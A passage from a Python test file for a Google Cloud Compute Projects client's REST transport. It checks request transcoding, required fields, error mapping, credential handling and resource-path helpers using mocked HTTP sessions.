    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_common_instance_metadata._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"

    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_common_instance_metadata._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.set_common_instance_metadata_unary(request)

            # No explicit query params expected: the defaulted required
            # field carries no value onto the wire.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_set_common_instance_metadata_unary_rest_unset_required_fields():
    """An empty request reports exactly the optional query params as unset.

    The expected set is the optional requestId minus the method's required
    fields (the intersection below is empty, so nothing required leaks in).
    """
    transport = transports.ProjectsRestTransport(
        # Fix: instantiate the credentials; the original passed the class
        # object itself (missing parentheses), unlike every other call site.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.set_common_instance_metadata._get_unset_required_fields({})
    assert set(unset_fields) == (
        set(("requestId",)) & set(("metadataResource", "project",))
    )
def test_set_common_instance_metadata_unary_rest_bad_request(
    transport: str = "rest",
    request_type=compute.SetCommonInstanceMetadataProjectRequest,
):
    """An HTTP 400 from the session surfaces as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # A request body that satisfies URI transcoding.
    request = request_type(
        {
            "project": "sample1",
            "metadata_resource": {
                "fingerprint": "fingerprint_value",
                "items": [{"key": "key_value", "value": "value_value"}],
                "kind": "kind_value",
            },
        }
    )
    # Fake a 400 reply from the underlying session and expect the mapped error.
    with mock.patch.object(Session, "request") as mocked_request:
        bad_response = Response()
        bad_response.status_code = 400
        bad_response.request = Request()
        mocked_request.return_value = bad_response
        with pytest.raises(core_exceptions.BadRequest):
            client.set_common_instance_metadata_unary(request)
def test_set_common_instance_metadata_unary_rest_flattened():
    """Flattened args are transcoded into the setCommonInstanceMetadata URL."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the session and hand back a successful, empty Operation payload.
    with mock.patch.object(type(client.transport._session), "request") as http_call:
        canned = Response()
        canned.status_code = 200
        canned._content = compute.Operation.to_json(compute.Operation()).encode(
            "UTF-8"
        )
        http_call.return_value = canned

        # Flattened fields; "sample1" is the path-parameter value the http
        # rule needs for transcoding (it overrides the placeholder project).
        client.set_common_instance_metadata_unary(
            project="sample1",
            metadata_resource=compute.Metadata(fingerprint="fingerprint_value"),
        )

        # Exactly one HTTP call, hitting the method's URI template.
        assert len(http_call.mock_calls) == 1
        _, call_args, _ = http_call.mock_calls[0]
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/setCommonInstanceMetadata"
            % client.transport._host,
            call_args[1],
        )
def test_set_common_instance_metadata_unary_rest_flattened_error(
    transport: str = "rest",
):
    """Passing a request object together with flattened fields must raise."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    resource = compute.Metadata(fingerprint="fingerprint_value")
    # Mixing a full request object with flattened arguments is ambiguous
    # and rejected by the generated client surface.
    with pytest.raises(ValueError):
        client.set_common_instance_metadata_unary(
            compute.SetCommonInstanceMetadataProjectRequest(),
            project="project_value",
            metadata_resource=resource,
        )
def test_set_common_instance_metadata_unary_rest_error():
    """Smoke test: a REST client can be constructed for this method."""
    creds = ga_credentials.AnonymousCredentials()
    client = ProjectsClient(credentials=creds, transport="rest")
@pytest.mark.parametrize(
    "request_type", [compute.SetDefaultNetworkTierProjectRequest, dict,]
)
def test_set_default_network_tier_unary_rest(request_type):
    """Happy path for setDefaultNetworkTier over REST: a mocked JSON body is
    parsed back into a fully-populated compute.Operation.

    Parametrized over the proto request class and a plain dict, since the
    client accepts either.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["projects_set_default_network_tier_request_resource"] = {
        "network_tier": "network_tier_value"
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        # Every scalar field is set so the JSON round-trip below exercises
        # the full message.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.set_default_network_tier_unary(request)

    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.name == "name_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_set_default_network_tier_unary_rest_required_fields(
    request_type=compute.SetDefaultNetworkTierProjectRequest,
):
    """Verify required-field handling: defaults are dropped from the JSON
    request, required fields must be present, and no unexpected query
    params are sent.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_default_network_tier._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_default_network_tier._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.set_default_network_tier_unary(request)

            # With transcode mocked to put everything in query_params,
            # no extra params should leak into the HTTP call.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_set_default_network_tier_unary_rest_unset_required_fields():
    """The unset-required-fields of an empty request are the query params
    intersected with the method's required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Bug fix: the credentials class was passed bare; every other call
        # site in this file instantiates it.  Pass an instance.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.set_default_network_tier._get_unset_required_fields({})
    # Intersection of the method's query params ("requestId") with its
    # required fields — for this method that intersection is empty.
    assert set(unset_fields) == (
        set(("requestId",))
        & set(("project", "projectsSetDefaultNetworkTierRequestResource",))
    )
def test_set_default_network_tier_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.SetDefaultNetworkTierProjectRequest
):
    """A 400 HTTP status from the server must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["projects_set_default_network_tier_request_resource"] = {
        "network_tier": "network_tier_value"
    }
    request = request_type(request_init)

    # Mock the http request call within the method and fake a BadRequest error.
    with mock.patch.object(Session, "request") as req, pytest.raises(
        core_exceptions.BadRequest
    ):
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 400
        response_value.request = Request()
        req.return_value = response_value
        client.set_default_network_tier_unary(request)
def test_set_default_network_tier_unary_rest_flattened():
    """Flattened (keyword-argument) call path: verify the REST request
    is sent exactly once and hits the expected setDefaultNetworkTier URL.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation()
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        # get arguments that satisfy an http rule for this method
        sample_request = {"project": "sample1"}
        # get truthy value for each flattened field
        mock_args = dict(
            project="project_value",
            projects_set_default_network_tier_request_resource=compute.ProjectsSetDefaultNetworkTierRequest(
                network_tier="network_tier_value"
            ),
        )
        mock_args.update(sample_request)
        client.set_default_network_tier_unary(**mock_args)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        # args[1] is the transcoded URI; validate it against the http rule.
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/setDefaultNetworkTier"
            % client.transport._host,
            args[1],
        )
def test_set_default_network_tier_unary_rest_flattened_error(transport: str = "rest"):
    """Supplying both a request object and flattened fields must raise."""
    client = ProjectsClient(
        transport=transport,
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mixing a populated request message with flattened keyword fields is
    # ambiguous, so the client is required to reject the call outright.
    request = compute.SetDefaultNetworkTierProjectRequest()
    resource = compute.ProjectsSetDefaultNetworkTierRequest(
        network_tier="network_tier_value"
    )
    with pytest.raises(ValueError):
        client.set_default_network_tier_unary(
            request,
            project="project_value",
            projects_set_default_network_tier_request_resource=resource,
        )
def test_set_default_network_tier_unary_rest_error():
    """Smoke test: a REST client can be constructed for this method."""
    creds = ga_credentials.AnonymousCredentials()
    client = ProjectsClient(credentials=creds, transport="rest")
@pytest.mark.parametrize(
    "request_type", [compute.SetUsageExportBucketProjectRequest, dict,]
)
def test_set_usage_export_bucket_unary_rest(request_type):
    """Happy path for setUsageExportBucket over REST: a mocked JSON body is
    parsed back into a fully-populated compute.Operation.

    Parametrized over the proto request class and a plain dict, since the
    client accepts either.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["usage_export_location_resource"] = {
        "bucket_name": "bucket_name_value",
        "report_name_prefix": "report_name_prefix_value",
    }
    request = request_type(request_init)
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        # Every scalar field is set so the JSON round-trip below exercises
        # the full message.
        return_value = compute.Operation(
            client_operation_id="client_operation_id_value",
            creation_timestamp="creation_timestamp_value",
            description="description_value",
            end_time="end_time_value",
            http_error_message="http_error_message_value",
            http_error_status_code=2374,
            id=205,
            insert_time="insert_time_value",
            kind="kind_value",
            name="name_value",
            operation_group_id="operation_group_id_value",
            operation_type="operation_type_value",
            progress=885,
            region="region_value",
            self_link="self_link_value",
            start_time="start_time_value",
            status=compute.Operation.Status.DONE,
            status_message="status_message_value",
            target_id=947,
            target_link="target_link_value",
            user="user_value",
            zone="zone_value",
        )
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        response = client.set_usage_export_bucket_unary(request)

    # Establish that the response is the type that we expect.
    assert isinstance(response, compute.Operation)
    assert response.client_operation_id == "client_operation_id_value"
    assert response.creation_timestamp == "creation_timestamp_value"
    assert response.description == "description_value"
    assert response.end_time == "end_time_value"
    assert response.http_error_message == "http_error_message_value"
    assert response.http_error_status_code == 2374
    assert response.id == 205
    assert response.insert_time == "insert_time_value"
    assert response.kind == "kind_value"
    assert response.name == "name_value"
    assert response.operation_group_id == "operation_group_id_value"
    assert response.operation_type == "operation_type_value"
    assert response.progress == 885
    assert response.region == "region_value"
    assert response.self_link == "self_link_value"
    assert response.start_time == "start_time_value"
    assert response.status == compute.Operation.Status.DONE
    assert response.status_message == "status_message_value"
    assert response.target_id == 947
    assert response.target_link == "target_link_value"
    assert response.user == "user_value"
    assert response.zone == "zone_value"
def test_set_usage_export_bucket_unary_rest_required_fields(
    request_type=compute.SetUsageExportBucketProjectRequest,
):
    """Verify required-field handling: defaults are dropped from the JSON
    request, required fields must be present, and no unexpected query
    params are sent.
    """
    transport_class = transports.ProjectsRestTransport

    request_init = {}
    request_init["project"] = ""
    request = request_type(request_init)
    jsonified_request = json.loads(
        request_type.to_json(
            request, including_default_value_fields=False, use_integers_for_enums=False
        )
    )

    # verify fields with default values are dropped
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_usage_export_bucket._get_unset_required_fields(jsonified_request)
    jsonified_request.update(unset_fields)

    # verify required fields with default values are now present
    jsonified_request["project"] = "project_value"
    unset_fields = transport_class(
        credentials=ga_credentials.AnonymousCredentials()
    ).set_usage_export_bucket._get_unset_required_fields(jsonified_request)
    # Check that path parameters and body parameters are not mixing in.
    assert not set(unset_fields) - set(("request_id",))
    jsonified_request.update(unset_fields)

    # verify required fields with non-default values are left alone
    assert "project" in jsonified_request
    assert jsonified_request["project"] == "project_value"

    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    request = request_type(request_init)

    # Designate an appropriate value for the returned response.
    return_value = compute.Operation()
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(Session, "request") as req:
        # We need to mock transcode() because providing default values
        # for required fields will fail the real version if the http_options
        # expect actual values for those fields.
        with mock.patch.object(path_template, "transcode") as transcode:
            # A uri without fields and an empty body will force all the
            # request fields to show up in the query_params.
            transcode_result = {
                "uri": "v1/sample_method",
                "method": "post",
                "query_params": request_init,
            }
            transcode_result["body"] = {}
            transcode.return_value = transcode_result

            response_value = Response()
            response_value.status_code = 200
            json_return_value = compute.Operation.to_json(return_value)
            response_value._content = json_return_value.encode("UTF-8")
            req.return_value = response_value

            response = client.set_usage_export_bucket_unary(request)

            # With transcode mocked to put everything in query_params,
            # no extra params should leak into the HTTP call.
            expected_params = []
            actual_params = req.call_args.kwargs["params"]
            assert expected_params == actual_params
def test_set_usage_export_bucket_unary_rest_unset_required_fields():
    """The unset-required-fields of an empty request are the query params
    intersected with the method's required fields.
    """
    transport = transports.ProjectsRestTransport(
        # Bug fix: the credentials class was passed bare; every other call
        # site in this file instantiates it.  Pass an instance.
        credentials=ga_credentials.AnonymousCredentials()
    )

    unset_fields = transport.set_usage_export_bucket._get_unset_required_fields({})
    # Intersection of the method's query params ("requestId") with its
    # required fields — for this method that intersection is empty.
    assert set(unset_fields) == (
        set(("requestId",)) & set(("project", "usageExportLocationResource",))
    )
def test_set_usage_export_bucket_unary_rest_bad_request(
    transport: str = "rest", request_type=compute.SetUsageExportBucketProjectRequest
):
    """A 400 HTTP status from the server must surface as core_exceptions.BadRequest."""
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport=transport,
    )
    # send a request that will satisfy transcoding
    request_init = {"project": "sample1"}
    request_init["usage_export_location_resource"] = {
        "bucket_name": "bucket_name_value",
        "report_name_prefix": "report_name_prefix_value",
    }
    request = request_type(request_init)

    # Mock the http request call within the method and fake a BadRequest error.
    with mock.patch.object(Session, "request") as req, pytest.raises(
        core_exceptions.BadRequest
    ):
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 400
        response_value.request = Request()
        req.return_value = response_value
        client.set_usage_export_bucket_unary(request)
def test_set_usage_export_bucket_unary_rest_flattened():
    """Flattened (keyword-argument) call path: verify the REST request
    is sent exactly once and hits the expected setUsageExportBucket URL.
    """
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(), transport="rest",
    )
    # Mock the http request call within the method and fake a response.
    with mock.patch.object(type(client.transport._session), "request") as req:
        # Designate an appropriate value for the returned response.
        return_value = compute.Operation()
        # Wrap the value into a proper Response obj
        response_value = Response()
        response_value.status_code = 200
        json_return_value = compute.Operation.to_json(return_value)
        response_value._content = json_return_value.encode("UTF-8")
        req.return_value = response_value
        # get arguments that satisfy an http rule for this method
        sample_request = {"project": "sample1"}
        # get truthy value for each flattened field
        mock_args = dict(
            project="project_value",
            usage_export_location_resource=compute.UsageExportLocation(
                bucket_name="bucket_name_value"
            ),
        )
        mock_args.update(sample_request)
        client.set_usage_export_bucket_unary(**mock_args)
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(req.mock_calls) == 1
        _, args, _ = req.mock_calls[0]
        # args[1] is the transcoded URI; validate it against the http rule.
        assert path_template.validate(
            "https://%s/compute/v1/projects/{project}/setUsageExportBucket"
            % client.transport._host,
            args[1],
        )
def test_set_usage_export_bucket_unary_rest_flattened_error(transport: str = "rest"):
    """Supplying both a request object and flattened fields must raise."""
    client = ProjectsClient(
        transport=transport,
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mixing a populated request message with flattened keyword fields is
    # ambiguous, so the client is required to reject the call outright.
    request = compute.SetUsageExportBucketProjectRequest()
    resource = compute.UsageExportLocation(bucket_name="bucket_name_value")
    with pytest.raises(ValueError):
        client.set_usage_export_bucket_unary(
            request,
            project="project_value",
            usage_export_location_resource=resource,
        )
def test_set_usage_export_bucket_unary_rest_error():
    """Smoke test: a REST client can be constructed for this method."""
    creds = ga_credentials.AnonymousCredentials()
    client = ProjectsClient(credentials=creds, transport="rest")
def test_credentials_transport_error():
    """Each mutually-exclusive combination of a transport instance with
    credentials / credentials_file / api_key / scopes must raise ValueError.
    """
    # It is an error to provide credentials and a transport instance.
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = ProjectsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport,
        )

    # It is an error to provide a credentials file and a transport instance.
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = ProjectsClient(
            client_options={"credentials_file": "credentials.json"},
            transport=transport,
        )

    # It is an error to provide an api_key and a transport instance.
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    options = client_options.ClientOptions()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = ProjectsClient(client_options=options, transport=transport,)

    # It is an error to provide an api_key and a credential.
    options = mock.Mock()
    options.api_key = "api_key"
    with pytest.raises(ValueError):
        client = ProjectsClient(
            client_options=options, credentials=ga_credentials.AnonymousCredentials()
        )

    # It is an error to provide scopes and a transport instance.
    transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    with pytest.raises(ValueError):
        client = ProjectsClient(
            client_options={"scopes": ["1", "2"]}, transport=transport,
        )
def test_transport_instance():
    """A client may be handed a pre-built transport and must use it as-is."""
    custom_transport = transports.ProjectsRestTransport(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # The exact same object (identity, not equality) must be exposed.
    assert ProjectsClient(transport=custom_transport).transport is custom_transport
@pytest.mark.parametrize("transport_class", [transports.ProjectsRestTransport,])
def test_transport_adc(transport_class):
    """Test default credentials are used if not provided."""
    # Patch Application Default Credentials resolution so no real auth
    # lookup happens; the transport must fall back to it exactly once.
    with mock.patch.object(google.auth, "default") as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport_class()
        adc.assert_called_once()
def test_projects_base_transport_error():
    """Credentials and credentials_file together must be rejected."""
    creds = ga_credentials.AnonymousCredentials()
    # The base transport forbids supplying both sources of credentials.
    with pytest.raises(core_exceptions.DuplicateCredentialArgs):
        transports.ProjectsTransport(
            credentials=creds,
            credentials_file="credentials.json",
        )
def test_projects_base_transport():
    """Every RPC stub on the abstract base transport raises NotImplementedError."""
    # Instantiate the base transport.
    with mock.patch(
        "google.cloud.compute_v1.services.projects.transports.ProjectsTransport.__init__"
    ) as Transport:
        Transport.return_value = None
        transport = transports.ProjectsTransport(
            credentials=ga_credentials.AnonymousCredentials(),
        )

    # Every method on the transport should just blindly
    # raise NotImplementedError.
    methods = (
        "disable_xpn_host",
        "disable_xpn_resource",
        "enable_xpn_host",
        "enable_xpn_resource",
        "get",
        "get_xpn_host",
        "get_xpn_resources",
        "list_xpn_hosts",
        "move_disk",
        "move_instance",
        "set_common_instance_metadata",
        "set_default_network_tier",
        "set_usage_export_bucket",
    )
    for method in methods:
        with pytest.raises(NotImplementedError):
            getattr(transport, method)(request=object())

    # close() is likewise abstract on the base class.
    with pytest.raises(NotImplementedError):
        transport.close()
def test_projects_base_transport_with_credentials_file():
    """A credentials_file is loaded with the compute default scopes and the
    given quota project.
    """
    # Instantiate the base transport with a credentials file
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch(
        "google.cloud.compute_v1.services.projects.transports.ProjectsTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.ProjectsTransport(
            credentials_file="credentials.json", quota_project_id="octopus",
        )
        load_creds.assert_called_once_with(
            "credentials.json",
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/compute",
                "https://www.googleapis.com/auth/cloud-platform",
            ),
            quota_project_id="octopus",
        )
def test_projects_base_transport_with_adc():
    """Test the default credentials are used if credentials and credentials_file are None."""
    with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
        "google.cloud.compute_v1.services.projects.transports.ProjectsTransport._prep_wrapped_messages"
    ) as Transport:
        Transport.return_value = None
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        transport = transports.ProjectsTransport()
        # ADC resolution must be consulted exactly once.
        adc.assert_called_once()
def test_projects_auth_adc():
    """If no credentials are provided, we should use ADC credentials."""
    with mock.patch.object(google.auth, "default", autospec=True) as adc:
        adc.return_value = (ga_credentials.AnonymousCredentials(), None)
        ProjectsClient()
        # ADC must be invoked with the compute default scopes and no
        # quota project.
        adc.assert_called_once_with(
            scopes=None,
            default_scopes=(
                "https://www.googleapis.com/auth/compute",
                "https://www.googleapis.com/auth/cloud-platform",
            ),
            quota_project_id=None,
        )
def test_projects_http_transport_client_cert_source_for_mtls():
    """The REST transport forwards a client cert source to mTLS channel setup."""
    cred = ga_credentials.AnonymousCredentials()
    with mock.patch(
        "google.auth.transport.requests.AuthorizedSession.configure_mtls_channel"
    ) as mock_configure_mtls_channel:
        transports.ProjectsRestTransport(
            credentials=cred, client_cert_source_for_mtls=client_cert_source_callback
        )
        # The same callback given to the transport must reach the session.
        mock_configure_mtls_channel.assert_called_once_with(client_cert_source_callback)
def test_projects_host_no_port():
    """An endpoint without an explicit port gets the default :443 appended."""
    options = client_options.ClientOptions(api_endpoint="compute.googleapis.com")
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=options,
    )
    assert client.transport._host == "compute.googleapis.com:443"
def test_projects_host_with_port():
    """An endpoint with an explicit port keeps that port unchanged."""
    options = client_options.ClientOptions(api_endpoint="compute.googleapis.com:8000")
    client = ProjectsClient(
        credentials=ga_credentials.AnonymousCredentials(),
        client_options=options,
    )
    assert client.transport._host == "compute.googleapis.com:8000"
def test_common_billing_account_path():
    """common_billing_account_path formats the canonical resource name."""
    billing_account = "squid"
    actual = ProjectsClient.common_billing_account_path(billing_account)
    assert actual == "billingAccounts/{}".format(billing_account)
def test_parse_common_billing_account_path():
    """Parsing inverts common_billing_account_path (round-trip)."""
    expected = {"billing_account": "clam"}
    path = ProjectsClient.common_billing_account_path(**expected)
    # Check that the path construction is reversible.
    assert ProjectsClient.parse_common_billing_account_path(path) == expected
def test_common_folder_path():
    """common_folder_path formats the canonical resource name."""
    folder = "whelk"
    actual = ProjectsClient.common_folder_path(folder)
    assert actual == "folders/{}".format(folder)
def test_parse_common_folder_path():
    """Parsing inverts common_folder_path (round-trip)."""
    expected = {"folder": "octopus"}
    path = ProjectsClient.common_folder_path(**expected)
    # Check that the path construction is reversible.
    assert ProjectsClient.parse_common_folder_path(path) == expected
def test_common_organization_path():
    """common_organization_path formats the canonical resource name."""
    organization = "oyster"
    actual = ProjectsClient.common_organization_path(organization)
    assert actual == "organizations/{}".format(organization)
def test_parse_common_organization_path():
    """Parsing inverts common_organization_path (round-trip)."""
    expected = {"organization": "nudibranch"}
    path = ProjectsClient.common_organization_path(**expected)
    # Check that the path construction is reversible.
    assert ProjectsClient.parse_common_organization_path(path) == expected
def test_common_project_path():
    """common_project_path formats the canonical resource name."""
    project = "cuttlefish"
    actual = ProjectsClient.common_project_path(project)
    assert actual == "projects/{}".format(project)
def test_parse_common_project_path():
    """Parsing inverts common_project_path (round-trip)."""
    expected = {"project": "mussel"}
    path = ProjectsClient.common_project_path(**expected)
    # Check that the path construction is reversible.
    assert ProjectsClient.parse_common_project_path(path) == expected
def test_common_location_path():
    """common_location_path formats the canonical resource name."""
    project = "winkle"
    location = "nautilus"
    actual = ProjectsClient.common_location_path(project, location)
    assert actual == "projects/{}/locations/{}".format(project, location)
def test_parse_common_location_path():
    """Parsing inverts common_location_path (round-trip)."""
    expected = {"project": "scallop", "location": "abalone"}
    path = ProjectsClient.common_location_path(**expected)
    # Check that the path construction is reversible.
    assert ProjectsClient.parse_common_location_path(path) == expected
def test_client_with_default_client_info():
    """client_info is forwarded to _prep_wrapped_messages both when a client
    is built directly and when the transport class is instantiated.
    """
    client_info = gapic_v1.client_info.ClientInfo()

    with mock.patch.object(
        transports.ProjectsTransport, "_prep_wrapped_messages"
    ) as prep:
        client = ProjectsClient(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)

    with mock.patch.object(
        transports.ProjectsTransport, "_prep_wrapped_messages"
    ) as prep:
        transport_class = ProjectsClient.get_transport_class()
        transport = transport_class(
            credentials=ga_credentials.AnonymousCredentials(), client_info=client_info,
        )
        prep.assert_called_once_with(client_info)
def test_transport_close():
    """Exiting the client context manager closes the underlying session."""
    # Maps transport name -> attribute on the transport that owns the
    # closable resource.
    transports = {
        "rest": "_session",
    }

    for transport, close_name in transports.items():
        client = ProjectsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        with mock.patch.object(
            type(getattr(client.transport, close_name)), "close"
        ) as close:
            # close() must fire on context exit, not on entry.
            with client:
                close.assert_not_called()
            close.assert_called_once()
def test_client_ctx():
    """The client context manager delegates close() to its transport."""
    transports = [
        "rest",
    ]
    for transport in transports:
        client = ProjectsClient(
            credentials=ga_credentials.AnonymousCredentials(), transport=transport
        )
        # Test client calls underlying transport.
        with mock.patch.object(type(client.transport), "close") as close:
            close.assert_not_called()
            with client:
                pass
            close.assert_called()
@pytest.mark.parametrize(
    "client_class,transport_class",
    [(ProjectsClient, transports.ProjectsRestTransport),],
)
def test_api_key_credentials(client_class, transport_class):
    """An api_key in client options is converted to API-key credentials and
    passed through to the transport constructor.
    """
    with mock.patch.object(
        google.auth._default, "get_api_key_credentials", create=True
    ) as get_api_key_credentials:
        mock_cred = mock.Mock()
        get_api_key_credentials.return_value = mock_cred
        options = client_options.ClientOptions()
        options.api_key = "api_key"
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options)
            # The transport must receive the API-key-derived credentials and
            # the standard defaults for everything else.
            patched.assert_called_once_with(
